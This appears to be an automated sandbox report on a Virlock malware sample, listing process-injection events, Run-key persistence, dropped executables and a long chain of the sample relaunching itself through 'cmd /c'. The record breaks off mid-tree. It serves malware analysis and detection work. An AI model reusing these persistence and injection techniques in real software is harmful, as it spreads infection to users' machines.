2116	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2116	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2776	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2776	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2772	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2772	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2068	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2068	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2928	xcYAwsIM.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2188 wrote to memory of 2928	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	28
PID 2188 wrote to memory of 2928	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	28
PID 2188 wrote to memory of 2928	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	28
PID 2188 wrote to memory of 2928	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	28
PID 2188 wrote to memory of 2720	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	29
PID 2188 wrote to memory of 2720	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	29
PID 2188 wrote to memory of 2720	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	29
PID 2188 wrote to memory of 2720	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	29
PID 2188 wrote to memory of 2668	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	30
PID 2188 wrote to memory of 2668	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	30
PID 2188 wrote to memory of 2668	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	30
PID 2188 wrote to memory of 2668	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	30
PID 2668 wrote to memory of 2512	2668	cmd.exe	33
PID 2668 wrote to memory of 2512	2668	cmd.exe	33
PID 2668 wrote to memory of 2512	2668	cmd.exe	33
PID 2668 wrote to memory of 2512	2668	cmd.exe	33
PID 2188 wrote to memory of 2504	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	32
PID 2188 wrote to memory of 2504	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	32
PID 2188 wrote to memory of 2504	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	32
PID 2188 wrote to memory of 2504	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	32
PID 2188 wrote to memory of 2496	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	34
PID 2188 wrote to memory of 2496	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	34
PID 2188 wrote to memory of 2496	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	34
PID 2188 wrote to memory of 2496	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	34
PID 2188 wrote to memory of 2544	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	35
PID 2188 wrote to memory of 2544	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	35
PID 2188 wrote to memory of 2544	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	35
PID 2188 wrote to memory of 2544	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	35
PID 2188 wrote to memory of 2428	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	39
PID 2188 wrote to memory of 2428	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	39
PID 2188 wrote to memory of 2428	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	39
PID 2188 wrote to memory of 2428	2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	39
PID 2512 wrote to memory of 2908	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	42
PID 2512 wrote to memory of 2908	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	42
PID 2512 wrote to memory of 2908	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	42
PID 2512 wrote to memory of 2908	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	42
PID 2428 wrote to memory of 2412	2428	cmd.exe	41
PID 2428 wrote to memory of 2412	2428	cmd.exe	41
PID 2428 wrote to memory of 2412	2428	cmd.exe	41
PID 2428 wrote to memory of 2412	2428	cmd.exe	41
PID 2908 wrote to memory of 2632	2908	cmd.exe	44
PID 2908 wrote to memory of 2632	2908	cmd.exe	44
PID 2908 wrote to memory of 2632	2908	cmd.exe	44
PID 2908 wrote to memory of 2632	2908	cmd.exe	44
PID 2512 wrote to memory of 2564	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	45
PID 2512 wrote to memory of 2564	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	45
PID 2512 wrote to memory of 2564	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	45
PID 2512 wrote to memory of 2564	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	45
PID 2512 wrote to memory of 2752	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	46
PID 2512 wrote to memory of 2752	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	46
PID 2512 wrote to memory of 2752	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	46
PID 2512 wrote to memory of 2752	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	46
PID 2512 wrote to memory of 2604	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	49
PID 2512 wrote to memory of 2604	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	49
PID 2512 wrote to memory of 2604	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	49
PID 2512 wrote to memory of 2604	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	49
PID 2512 wrote to memory of 288	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	50
PID 2512 wrote to memory of 288	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	50
PID 2512 wrote to memory of 288	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	50
PID 2512 wrote to memory of 288	2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe	50
PID 288 wrote to memory of 2156	288	cmd.exe	53
PID 288 wrote to memory of 2156	288	cmd.exe	53
PID 288 wrote to memory of 2156	288	cmd.exe	53
PID 288 wrote to memory of 2156	288	cmd.exe	53

C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
"C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Users\Admin\naooscwU\xcYAwsIM.exe
  "C:\Users\Admin\naooscwU\xcYAwsIM.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:2928
- C:\ProgramData\kgYwAggM\aCgkAQQg.exe
  "C:\ProgramData\kgYwAggM\aCgkAQQg.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2668
- - C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
    C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2632
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        6⤵
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:584
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        8⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1836
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        10⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1420
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        12⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3004
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        14⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2472
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        16⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        17⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1640
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        18⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        19⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2360
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        20⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:576
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        22⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        23⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2056
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        24⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        25⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2232
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        26⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2660
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        28⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        29⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2500
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        30⤵
        
        PID:1280
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        31⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2312
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        32⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        33⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2964
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        34⤵
        
        PID:900
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        35⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        36⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        37⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2784
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        38⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        39⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        40⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        41⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2848
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        42⤵
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        43⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3032
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        44⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        45⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1212
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        46⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        47⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2528
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        48⤵
        
        PID:896
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        49⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1984
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        50⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        51⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2696
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        52⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        53⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1508
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        54⤵
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        55⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2116
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        56⤵
        
        PID:240
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        57⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2776
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        58⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        59⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2772
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        60⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        61⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2068
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        62⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        63⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1512
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        64⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        65⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        66⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        67⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        68⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        69⤵
        
        PID:692
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        70⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        71⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        72⤵
        
        PID:1696
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        73⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        74⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        75⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        76⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        77⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        78⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        79⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        80⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        81⤵
        
        PID:1280
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        82⤵
        
        PID:596
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        83⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\cmd.exe
        
